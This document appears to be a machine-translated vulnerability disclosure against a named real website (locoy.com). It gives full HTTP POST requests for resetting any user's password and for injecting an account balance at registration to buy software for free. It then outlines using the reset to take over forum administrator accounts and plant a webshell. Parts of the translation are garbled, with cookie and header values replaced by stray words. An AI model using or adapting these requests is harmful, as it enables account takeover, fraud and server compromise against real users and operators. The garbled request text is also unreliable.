Getwebshell is available for two bugs on the locomotive collector website.

Getwebshell is available for two bugs on the locomotive collector website.

2. Code Design Issues.

1: Any user password change location http://www.locoy.com/member/getpwd.php

First, register the user. Then select "retrieve password". Enter the correct user name and the user's registered email address. The system sends the URL for password retrieval to the user's email address.

Like: http://www.locoy.com/member/getpwd.php? Action = getpwd & step = 4 & userid = [user id] & authstr = [32-bit password]

In this case, you can directly send a package and modify the POST parameter to reset any user password.

Host: www. locoy. comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) Gecko/20100101 Firefox/37.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateReferer: http://www.locoy.com/member/getpwd.php?action=getpwd&step=4&userid= [User id] & authstr = [32-bit password] Cookie: 800019423 slid = s0000_82_26 % 7C; 800019423mid = 89_26; 800019423mh = 1428728177141; 800019423is = 2; CNZZDATA5740700 = cnzz_eid % hour % 253A % 252F % hour % 252F % 26 ntime % 3D1428723746; pgv_pvi = 6005643264; hour = 31536000; DlqmrLfmUGusername = [hidden content]; pai_lasttime = 1428727989957; export _count = 0; pgv_si = s563043328; PHPSESSID = Hangzhou; 800019423 slid = s0000_409_57 % 7C; 800019423mid = 2017_16; 800019423mh = 1428728161450; signature = % u60A8 % u597D % uFF0C % u8FD9 % u91CC % u662F % u706B % signature % u91C7 % u96C6 % u5668 % signature % uFF0C % u8BF7 % u95EE % response % signature % u4E48 % u53EF % u4EE5 % u5E2E % u5230 % u60A8 % uFF1F % signature % u51FB % signature % u53EF % u8FDB % u884C % u804A % u5929; 800019423s0000_409_57 = 1428728161466 Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 163 name = [enter the user account you want to change the password here] & email = [original user email] & password = [password you want to set] & pwdconfirm = [Confirm password] & authstr = 7131195707e5a8da32a54d89047fa17b & userid = [hide content] & step = 4 & dosubmit = % CF % C2 % D2 % BB % B2 % BD

For details, see the http post package. After modifying the POST package, you can directly send the package to make the modification successful.
 

2: newly registered users can arbitrarily modify the user account balance vulnerability.

When registering and sending a package: Add a new parameter, that is, memberinfo [amount] = 10 new registered users have a balance of 10 yuan after registration. You can directly purchase the latest version of locomotive software in the mall.

POST/member/register. php HTTP/1.1 Host: www. locoy. comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 37.0) Gecko/20100101 Firefox/37.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateReferer: http://www.locoy.com/member/register.phpCookie : 800019423 slid = %% 7C; 800019423mid = 748_34; %= 1428728833832; %= 2; CNZZDATA5740700 = cnzz_eid % %%253a % 252F % %252f % 26 ntime % 3D1428723746; pgv_pvi = 6005643264; DlqmrLfmUGcookietime = 31536000; DlqmrLfmUGusername = [hidden content]; pai_lasttime = 1428727989957; pai_count = 0; pgv_si = s563043328; PHPSESSID = bytes; 800019423 slid = s0000_928_54 % 7cs1__592_82% 7cs1__213_92% 7C; 800019423mid = 214_57; 800019423mh = 1428728735214; 800019423is = 2; signature = % u60A8 % u597D % uFF0C % u8FD9 % u91CC % u662F % u706B % signature % u91C7 % u96C6 % u5668 % signature % uFF0C % u8BF7 % u95EE % response % signature % u4E48 % u53EF % u4EE5 % u5E2E % u5230 % u60A8 % uFF1F % u70B9 % u51FB % signature % u53EF % u8FDB % u884C % u804A % signature: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 246 memberinfo % 5 Busername % 5D = [hidden content] & memberinfo % 5 Bpassword % 5D = 123123 & pwdconfirm = 123123 & memberinfo % 5 Bemail % 5D = [hidden content] & checkcodestr = undeemed & memberinfo % 5 Bmodelid % 5D = [fill in any amount here] & memberinfo % 5 bamount % 5d = 10®Agreement = 1 & action = register & dosubmit = ++ % D7 % A2 ++ % B2 % E1 ++ & vundeemed = undeemed

 

Based on the first arbitrary password Modification Vulnerability, you can find several administrator accounts in bbs.locoy.com and reset their passwords. Then you can log on to the discuz 3.2 background.

Then getwebshell... the main site and BBS are on the same server. Then there is no more ....
 

 

 

Solution:

Enhanced Filtering